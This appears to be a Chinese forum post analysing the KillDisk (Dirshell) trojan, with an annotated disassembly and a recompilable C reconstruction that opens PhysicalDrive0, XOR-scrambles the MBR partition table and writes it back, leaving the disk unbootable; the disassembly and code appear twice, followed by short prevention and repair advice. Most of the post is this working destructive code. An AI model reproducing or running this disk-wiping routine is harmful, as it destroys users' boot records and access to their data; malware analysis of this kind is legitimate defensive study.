Trojan.Win32.KillDisk.X(Dirshell)拆解
FSCTL_LOCK_VOLUME 锁住硬盘
004010E9 |. 56 push esi ; |hDevice
004010EA |. FFD3 call ebx ; \DeviceIoControl
004010EC |. 8D4424 10 lea eax, [esp+10]
004010F0 |. 6A 00 push 0 ; /pOverlapped = NULL
004010F2 |. 50 push eax ; |pBytesReturned
004010F3 |. 8D4C24 20 lea ecx, [esp+20] ; |
004010F7 |. 6A 18 push 18 ; |OutBufferSize = 18 (24.)
004010F9 |. 51 push ecx ; |OutBuffer
004010FA |. 6A 00 push 0 ; |InBufferSize = 0
004010FC |. 6A 00 push 0 ; |InBuffer = NULL
004010FE |. 68 00000700 push 70000 ; |IoControlCode = IOCTL_DISK_GET_DRIVE_GEOMETRY 取得硬盘结构
00401103 |. 56 push esi ; |hDevice
00401104 |. FFD3 call ebx ; \DeviceIoControl
00401106 |. 8B5424 2C mov edx, [esp+2C]
0040110A |. 52 push edx ; /HeapSize
0040110B |. 6A 08 push 8 ; |Flags = HEAP_ZERO_MEMORY
0040110D |. FF15 1C404000 call [<&kernel32.GetProcessHeap>] ; |[GetProcessHeap
00401113 |. 50 push eax ; |hHeap
00401114 |. FF15 18404000 call [<&kernel32.HeapAlloc>] ; \HeapAlloc
0040111A |. 8BF8 mov edi, eax
0040111C |. 85FF test edi, edi
0040111E |. 0F84 50010000 je 00401274
00401124 |. 8D4424 14 lea eax, [esp+14]
00401128 |. 6A 00 push 0 ; /pOverlapped = NULL
0040112A |. 50 push eax ; |pBytesRead
0040112B |. 68 00020000 push 200 ; |BytesToRead = 200 (512.)
00401130 |. 57 push edi ; |Buffer
00401131 |. 56 push esi ; |hFile
00401132 |. FF15 14404000 call [<&kernel32.ReadFile>] ; \ReadFile
00401138 |. 85C0 test eax, eax
0040113A |. 0F84 34010000 je 00401274 ; 读取MBR内容,出错就跳走
00401140 |. 817C24 14 000>cmp dword ptr [esp+14], 200 ; 是否读取了512字节
00401148 |. 0F82 26010000 jb 00401274 ; 没有就跳走
0040114E |. C687 BE010000>mov byte ptr [edi+1BE], 80 ; 设置为活动分区
00401155 |. C687 BF010000>mov byte ptr [edi+1BF], 0
0040115C |. C687 C2010000>mov byte ptr [edi+1C2], 5
00401163 |. B8 C3010000 mov eax, 1C3
00401168 |> 8A0C38 /mov cl, [eax+edi] ; 从0x1C3开始,分区表的每个字节与26异或
0040116B |. 80F1 26 |xor cl, 26 ;这里为什么与26异或就可以弄成循环,请高手赐教,谢谢
0040116E |. 880C38 |mov [eax+edi], cl
00401171 |. 40 |inc eax
00401172 |. 3D FE010000 |cmp eax, 1FE
00401177 |.^ 7C EF \jl short 00401168 ; 到0x1FE结束
00401179 |. 8D4C24 10 lea ecx, [esp+10]
0040117D |. 6A 00 push 0
0040117F |. 51 push ecx
00401180 |. 6A 00 push 0
00401182 |. 6A 00 push 0
00401184 |. 6A 00 push 0
00401186 |. 6A 00 push 0
00401188 |. 68 1C000900 push 9001C
0040118D |. 56 push esi
0040118E |. FFD3 call ebx
00401190 |. 8B2D 10404000 mov ebp, [<&kernel32.CloseHandle>] ; kernel32.CloseHandle
00401196 |. 56 push esi ; /hObject
00401197 |. FFD5 call ebp ; \CloseHandle
00401199 |. 8D5424 30 lea edx, [esp+30]
0040119D |. 68 78504000 push 00405078 ; /Format = "\\.\PHYSICALDRIVE0"
004011A2 |. 52 push edx ; |s
004011A3 |. FF15 CC404000 call [<&user32.wsprintfA>] ; \wsprintfA
004011A9 |. 83C4 08 add esp, 8
004011AC |. 8D4424 30 lea eax, [esp+30]
004011B0 |. 6A 00 push 0 ; /hTemplateFile = NULL
004011B2 |. 6A 00 push 0 ; |Attributes = 0
004011B4 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
004011B6 |. 6A 00 push 0 ; |pSecurity = NULL
004011B8 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004011BA |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004011BF |. 50 push eax ; |FileName
004011C0 |. FF15 44404000 call [<&kernel32.CreateFileA>] ; \CreateFileA
004011C6 |. 8BF0 mov esi, eax
004011C8 |. 83FE FF cmp esi, -1
004011CB |. 0F84 A3000000 je 00401274
004011D1 |. 8D4C24 10 lea ecx, [esp+10]
004011D5 |. 6A 00 push 0
004011D7 |. 51 push ecx
004011D8 |. 6A 00 push 0
004011DA |. 6A 00 push 0
004011DC |. 6A 00 push 0
004011DE |. 6A 00 push 0
004011E0 |. 68 18000900 push 90018
004011E5 |. 56 push esi
004011E6 |. FFD3 call ebx
004011E8 |. 8D5424 10 lea edx, [esp+10]
004011EC |. 6A 00 push 0
004011EE |. 52 push edx
004011EF |. 8D4424 20 lea eax, [esp+20]
004011F3 |. 6A 18 push 18
004011F5 |. 50 push eax
004011F6 |. 6A 00 push 0
004011F8 |. 6A 00 push 0
004011FA |. 68 00000700 push 70000
004011FF |. 56 push esi
00401200 |. FFD3 call ebx
00401202 |. 8D4C24 14 lea ecx, [esp+14]
00401206 |. 6A 00 push 0 ; /pOverlapped = NULL
00401208 |. 51 push ecx ; |pBytesWritten
00401209 |. 68 00020000 push 200 ; |nBytesToWrite = 200 (512.)
0040120E |. 57 push edi ; |Buffer
0040120F |. 56 push esi ; |hFile
00401210 |. FF15 24404000 call [<&kernel32.WriteFile>] ; \WriteFile
00401216 |. 85C0 test eax, eax ; 写入修改后的分区表内容
00401218 |. 74 5A je short 00401274 ; 写入失败就跳走
0040121A |. 817C24 14 000>cmp dword ptr [esp+14], 200 ; 是否写入了512字节
00401222 |. 72 50 jb short 00401274 ; 没有就跳走
00401224 |. 8D5424 10 lea edx, [esp+10]
00401228 |. 6A 00 push 0
0040122A |. 52 push edx
0040122B |. 6A 00 push 0
0040122D |. 6A 00 push 0
0040122F |. 6A 00 push 0
00401231 |. 6A 00 push 0
00401233 |. 68 1C000900 push 9001C
00401238 |. 56 push esi
00401239 |. FFD3 call ebx
0040123B |. 57 push edi ; /pMemory
0040123C |. 6A 01 push 1 ; |Flags = HEAP_NO_SERIALIZE
0040123E |. FF15 1C404000 call [<&kernel32.GetProcessHeap>] ; |[GetProcessHeap
00401244 |. 50 push eax ; |hHeap
00401245 |. FF15 3C404000 call [<&kernel32.HeapFree>] ; \HeapFree
0040124B |. 56 push esi
0040124C |. FFD5 call ebp
0040124E |. 6A 00 push 0 ; /Style = MB_OK|MB_APPLMODAL
00401250 |. 68 70504000 push 00405070 ; |Title = "找死"
00401255 |. 68 44504000 push 00405044 ; |Text = "猪三?,AC,"猪三哈哈?,AC,"就是猪三?,BD,",等死",B0,"?哈哈...."
0040125A |. 6A 00 push 0 ; |hOwner = NULL
0040125C |. FF15 C4404000 call [<&user32.MessageBoxA>] ; \MessageBoxA
00401262 |. E8 99FDFFFF call 00401000 ; 提示些无聊的信息
00401267 |. 5F pop edi
00401268 |. 5E pop esi
00401269 |. 5D pop ebp
0040126A |. B8 01000000 mov eax, 1
0040126F |. 5B pop ebx
00401270 |. 83C4 60 add esp, 60
00401273 |. C3 retn
00401274 |> 5F pop edi
00401275 |. 5E pop esi
00401276 |. 5D pop ebp
00401277 |. 33C0 xor eax, eax
00401279 |. 5B pop ebx
0040127A |. 83C4 60 add esp, 60
0040127D \. C3 retn
调了几个基本的API,用VC还原以上内容如下:
HANDLE hDevice;
TCHAR szDevicename[64];
LPTSTR szBuff;
DISK_GEOMETRY Geometry;
BOOL bRet;
DWORD bytes,bread,count;
char *drive = "0";
BYTE pMBR[512]={0};
bytes = 512;
wsprintf(szDevicename,"\\\\.\\PHYSICALDRIVE%c",*drive);
hDevice = CreateFile( szDevicename,
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
{
MessageBox("Open Device Error!");
ExitProcess(0);
}
DeviceIoControl(hDevice,FSCTL_LOCK_VOLUME, NULL,0,NULL,0,&count,NULL);
DeviceIoControl(hDevice,IOCTL_DISK_GET_DRIVE_GEOMETRY,NULL,0,
&Geometry,sizeof(DISK_GEOMETRY),&count,NULL);
szBuff = (LPSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,Geometry.BytesPerSector);
if ( szBuff == NULL)
{
MessageBox("Memery Allocation Error!");
}
bRet = ReadFile(hDevice, szBuff, bytes, &bread, NULL);
if (bRet==FALSE || bread<512)
{
MessageBox("Read Device Error!");
}
for(int n=0;n<512;n++)
{
pMBR[n] = szBuff[n];
}
DeviceIoControl(hDevice,FSCTL_UNLOCK_VOLUME, NULL,0,NULL,0,&count,NULL);
CloseHandle(hDevice);
pMBR[0x1BE]=80;
pMBR[0x1BF]=0;
pMBR[0x1C2]=5;
for (n=0x1C3;n<=0x1FE;n++)
{
pMBR[n]=pMBR[n] ^ 26;
}
hDevice = CreateFile( szDevicename,
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
{
MessageBox("Open Device Error!");
ExitProcess(0);
}
DeviceIoControl(hDevice,FSCTL_LOCK_VOLUME, NULL,0,NULL,0,&count,NULL);
bRet=WriteFile(hDevice,pMBR,bytes,&bread,NULL);
if (bRet == FALSE || bread<512)
{
MessageBox("Write File Error!");
}
DeviceIoControl(hDevice,FSCTL_UNLOCK_VOLUME, NULL,0,NULL,0,&count,NULL);
CloseHandle(hDevice);
附完整源码.和我下载的病毒程序.(请不要在实机测试,后果自负.)
后记:目前防止该病毒只有2种方法
1.不要使用管理员帐号.MSDN里面这样说的:
2.目前唯一能防止改病毒的HIPS(Hosted-Based Intrusion Prevention System )-System Safety Monitor(SSM),SSM可以检测到各类程序对硬盘底层的访问.从而阻止该动作
至于中了这个之后的修复问题,只能用改过IO.SYS的DOS引导盘启动电脑,然后用diskgen修复.因为死循环找成引导系统无法找到硬盘分区,就无法启动了.
或者直接用深山红叶的WIN PE工具盘来修复,非常方便.
http://www.hack58.net/Article/60/64/2006/11308.htm
004010E9 |. 56 push esi ; |hDevice
004010EA |. FFD3 call ebx ; \DeviceIoControl
004010EC |. 8D4424 10 lea eax, [esp+10]
004010F0 |. 6A 00 push 0 ; /pOverlapped = NULL
004010F2 |. 50 push eax ; |pBytesReturned
004010F3 |. 8D4C24 20 lea ecx, [esp+20] ; |
004010F7 |. 6A 18 push 18 ; |OutBufferSize = 18 (24.)
004010F9 |. 51 push ecx ; |OutBuffer
004010FA |. 6A 00 push 0 ; |InBufferSize = 0
004010FC |. 6A 00 push 0 ; |InBuffer = NULL
004010FE |. 68 00000700 push 70000 ; |IoControlCode = IOCTL_DISK_GET_DRIVE_GEOMETRY 取得硬盘结构
00401103 |. 56 push esi ; |hDevice
00401104 |. FFD3 call ebx ; \DeviceIoControl
00401106 |. 8B5424 2C mov edx, [esp+2C]
0040110A |. 52 push edx ; /HeapSize
0040110B |. 6A 08 push 8 ; |Flags = HEAP_ZERO_MEMORY
0040110D |. FF15 1C404000 call [<&kernel32.GetProcessHeap>] ; |[GetProcessHeap
00401113 |. 50 push eax ; |hHeap
00401114 |. FF15 18404000 call [<&kernel32.HeapAlloc>] ; \HeapAlloc
0040111A |. 8BF8 mov edi, eax
0040111C |. 85FF test edi, edi
0040111E |. 0F84 50010000 je 00401274
00401124 |. 8D4424 14 lea eax, [esp+14]
00401128 |. 6A 00 push 0 ; /pOverlapped = NULL
0040112A |. 50 push eax ; |pBytesRead
0040112B |. 68 00020000 push 200 ; |BytesToRead = 200 (512.)
00401130 |. 57 push edi ; |Buffer
00401131 |. 56 push esi ; |hFile
00401132 |. FF15 14404000 call [<&kernel32.ReadFile>] ; \ReadFile
00401138 |. 85C0 test eax, eax
0040113A |. 0F84 34010000 je 00401274 ; 读取MBR内容,出错就跳走
00401140 |. 817C24 14 000>cmp dword ptr [esp+14], 200 ; 是否读取了512字节
00401148 |. 0F82 26010000 jb 00401274 ; 没有就跳走
0040114E |. C687 BE010000>mov byte ptr [edi+1BE], 80 ; 设置为活动分区
00401155 |. C687 BF010000>mov byte ptr [edi+1BF], 0
0040115C |. C687 C2010000>mov byte ptr [edi+1C2], 5
00401163 |. B8 C3010000 mov eax, 1C3
00401168 |> 8A0C38 /mov cl, [eax+edi] ; 从0x1C3开始,分区表的每个字节与26异或
0040116B |. 80F1 26 |xor cl, 26 ;这里为什么与26异或就可以弄成循环,请高手赐教,谢谢
0040116E |. 880C38 |mov [eax+edi], cl
00401171 |. 40 |inc eax
00401172 |. 3D FE010000 |cmp eax, 1FE
00401177 |.^ 7C EF \jl short 00401168 ; 到0x1FE结束
00401179 |. 8D4C24 10 lea ecx, [esp+10]
0040117D |. 6A 00 push 0
0040117F |. 51 push ecx
00401180 |. 6A 00 push 0
00401182 |. 6A 00 push 0
00401184 |. 6A 00 push 0
00401186 |. 6A 00 push 0
00401188 |. 68 1C000900 push 9001C
0040118D |. 56 push esi
0040118E |. FFD3 call ebx
00401190 |. 8B2D 10404000 mov ebp, [<&kernel32.CloseHandle>] ; kernel32.CloseHandle
00401196 |. 56 push esi ; /hObject
00401197 |. FFD5 call ebp ; \CloseHandle
00401199 |. 8D5424 30 lea edx, [esp+30]
0040119D |. 68 78504000 push 00405078 ; /Format = "\\.\PHYSICALDRIVE0"
004011A2 |. 52 push edx ; |s
004011A3 |. FF15 CC404000 call [<&user32.wsprintfA>] ; \wsprintfA
004011A9 |. 83C4 08 add esp, 8
004011AC |. 8D4424 30 lea eax, [esp+30]
004011B0 |. 6A 00 push 0 ; /hTemplateFile = NULL
004011B2 |. 6A 00 push 0 ; |Attributes = 0
004011B4 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
004011B6 |. 6A 00 push 0 ; |pSecurity = NULL
004011B8 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004011BA |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004011BF |. 50 push eax ; |FileName
004011C0 |. FF15 44404000 call [<&kernel32.CreateFileA>] ; \CreateFileA
004011C6 |. 8BF0 mov esi, eax
004011C8 |. 83FE FF cmp esi, -1
004011CB |. 0F84 A3000000 je 00401274
004011D1 |. 8D4C24 10 lea ecx, [esp+10]
004011D5 |. 6A 00 push 0
004011D7 |. 51 push ecx
004011D8 |. 6A 00 push 0
004011DA |. 6A 00 push 0
004011DC |. 6A 00 push 0
004011DE |. 6A 00 push 0
004011E0 |. 68 18000900 push 90018
004011E5 |. 56 push esi
004011E6 |. FFD3 call ebx
004011E8 |. 8D5424 10 lea edx, [esp+10]
004011EC |. 6A 00 push 0
004011EE |. 52 push edx
004011EF |. 8D4424 20 lea eax, [esp+20]
004011F3 |. 6A 18 push 18
004011F5 |. 50 push eax
004011F6 |. 6A 00 push 0
004011F8 |. 6A 00 push 0
004011FA |. 68 00000700 push 70000
004011FF |. 56 push esi
00401200 |. FFD3 call ebx
00401202 |. 8D4C24 14 lea ecx, [esp+14]
00401206 |. 6A 00 push 0 ; /pOverlapped = NULL
00401208 |. 51 push ecx ; |pBytesWritten
00401209 |. 68 00020000 push 200 ; |nBytesToWrite = 200 (512.)
0040120E |. 57 push edi ; |Buffer
0040120F |. 56 push esi ; |hFile
00401210 |. FF15 24404000 call [<&kernel32.WriteFile>] ; \WriteFile
00401216 |. 85C0 test eax, eax ; 写入修改后的分区表内容
00401218 |. 74 5A je short 00401274 ; 写入失败就跳走
0040121A |. 817C24 14 000>cmp dword ptr [esp+14], 200 ; 是否写入了512字节
00401222 |. 72 50 jb short 00401274 ; 没有就跳走
00401224 |. 8D5424 10 lea edx, [esp+10]
00401228 |. 6A 00 push 0
0040122A |. 52 push edx
0040122B |. 6A 00 push 0
0040122D |. 6A 00 push 0
0040122F |. 6A 00 push 0
00401231 |. 6A 00 push 0
00401233 |. 68 1C000900 push 9001C
00401238 |. 56 push esi
00401239 |. FFD3 call ebx
0040123B |. 57 push edi ; /pMemory
0040123C |. 6A 01 push 1 ; |Flags = HEAP_NO_SERIALIZE
0040123E |. FF15 1C404000 call [<&kernel32.GetProcessHeap>] ; |[GetProcessHeap
00401244 |. 50 push eax ; |hHeap
00401245 |. FF15 3C404000 call [<&kernel32.HeapFree>] ; \HeapFree
0040124B |. 56 push esi
0040124C |. FFD5 call ebp
0040124E |. 6A 00 push 0 ; /Style = MB_OK|MB_APPLMODAL
00401250 |. 68 70504000 push 00405070 ; |Title = "找死"
00401255 |. 68 44504000 push 00405044 ; |Text = "猪三?,AC,"猪三哈哈?,AC,"就是猪三?,BD,",等死",B0,"?哈哈...."
0040125A |. 6A 00 push 0 ; |hOwner = NULL
0040125C |. FF15 C4404000 call [<&user32.MessageBoxA>] ; \MessageBoxA
00401262 |. E8 99FDFFFF call 00401000 ; 提示些无聊的信息
00401267 |. 5F pop edi
00401268 |. 5E pop esi
00401269 |. 5D pop ebp
0040126A |. B8 01000000 mov eax, 1
0040126F |. 5B pop ebx
00401270 |. 83C4 60 add esp, 60
00401273 |. C3 retn
00401274 |> 5F pop edi
00401275 |. 5E pop esi
00401276 |. 5D pop ebp
00401277 |. 33C0 xor eax, eax
00401279 |. 5B pop ebx
0040127A |. 83C4 60 add esp, 60
0040127D \. C3 retn
[Copy to clipboard]
调了几个基本的API,用VC还原以上内容如下:
CODE:
HANDLE hDevice;
TCHAR szDevicename[64];
LPTSTR szBuff;
DISK_GEOMETRY Geometry;
BOOL bRet;
DWORD bytes,bread,count;
char *drive = "0";
BYTE pMBR[512]={0};
bytes = 512;
wsprintf(szDevicename,"\\\\.\\PHYSICALDRIVE%c",*drive);
hDevice = CreateFile( szDevicename,
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
{
MessageBox("Open Device Error!");
ExitProcess(0);
}
DeviceIoControl(hDevice,FSCTL_LOCK_VOLUME, NULL,0,NULL,0,&count,NULL);
DeviceIoControl(hDevice,IOCTL_DISK_GET_DRIVE_GEOMETRY,NULL,0,
&Geometry,sizeof(DISK_GEOMETRY),&count,NULL);
szBuff = (LPSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,Geometry.BytesPerSector);
if ( szBuff == NULL)
{
MessageBox("Memery Allocation Error!");
}
bRet = ReadFile(hDevice, szBuff, bytes, &bread, NULL);
if (bRet==FALSE || bread<512)
{
MessageBox("Read Device Error!");
}
for(int n=0;n<512;n++)
{
pMBR[n] = szBuff[n];
}
DeviceIoControl(hDevice,FSCTL_UNLOCK_VOLUME, NULL,0,NULL,0,&count,NULL);
CloseHandle(hDevice);
pMBR[0x1BE]=80;
pMBR[0x1BF]=0;
pMBR[0x1C2]=5;
for (n=0x1C3;n<=0x1FE;n++)
{
pMBR[n]=pMBR[n] ^ 26;
}
hDevice = CreateFile( szDevicename,
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
{
MessageBox("Open Device Error!");
ExitProcess(0);
}
DeviceIoControl(hDevice,FSCTL_LOCK_VOLUME, NULL,0,NULL,0,&count,NULL);
bRet=WriteFile(hDevice,pMBR,bytes,&bread,NULL);
if (bRet == FALSE || bread<512)
{
MessageBox("Write File Error!");
}
DeviceIoControl(hDevice,FSCTL_UNLOCK_VOLUME, NULL,0,NULL,0,&count,NULL);
CloseHandle(hDevice);
[Copy to clipboard]
附完整源码.和我下载的病毒程序.(请不要在实机测试,后果自负.)
后记:目前防止该病毒只有2种方法
1.不要使用管理员帐号.MSDN里面这样说的:
QUOTE:
Physical Disks and Volumes
You can use the CreateFile function to open a physical disk drive or a volume. The function returns a handle that can be used with the DeviceIoControl function. This enables you to access the disk partition table. However, it is potentially dangerous to do so, because an incorrect write to a disk could make its contents inaccessible. The following requirements must be met for such a call to succeed:
The caller must have administrative privileges. For more information, see Running with Special Privileges.
The dwCreationDisposition parameter must have the OPEN_EXISTING flag.
When opening a volume or floppy disk, the dwShareMode parameter must have the FILE_SHARE_WRITE flag.
You can use the CreateFile function to open a physical disk drive or a volume. The function returns a handle that can be used with the DeviceIoControl function. This enables you to access the disk partition table. However, it is potentially dangerous to do so, because an incorrect write to a disk could make its contents inaccessible. The following requirements must be met for such a call to succeed:
The caller must have administrative privileges. For more information, see Running with Special Privileges.
The dwCreationDisposition parameter must have the OPEN_EXISTING flag.
When opening a volume or floppy disk, the dwShareMode parameter must have the FILE_SHARE_WRITE flag.
2.目前唯一能防止改病毒的HIPS(Hosted-Based Intrusion Prevention System )-System Safety Monitor(SSM),SSM可以检测到各类程序对硬盘底层的访问.从而阻止该动作
至于中了这个之后的修复问题,只能用改过IO.SYS的DOS引导盘启动电脑,然后用diskgen修复.因为死循环找成引导系统无法找到硬盘分区,就无法启动了.
或者直接用深山红叶的WIN PE工具盘来修复,非常方便.
http://www.hack58.net/Article/60/64/2006/11308.htm
0
相关文章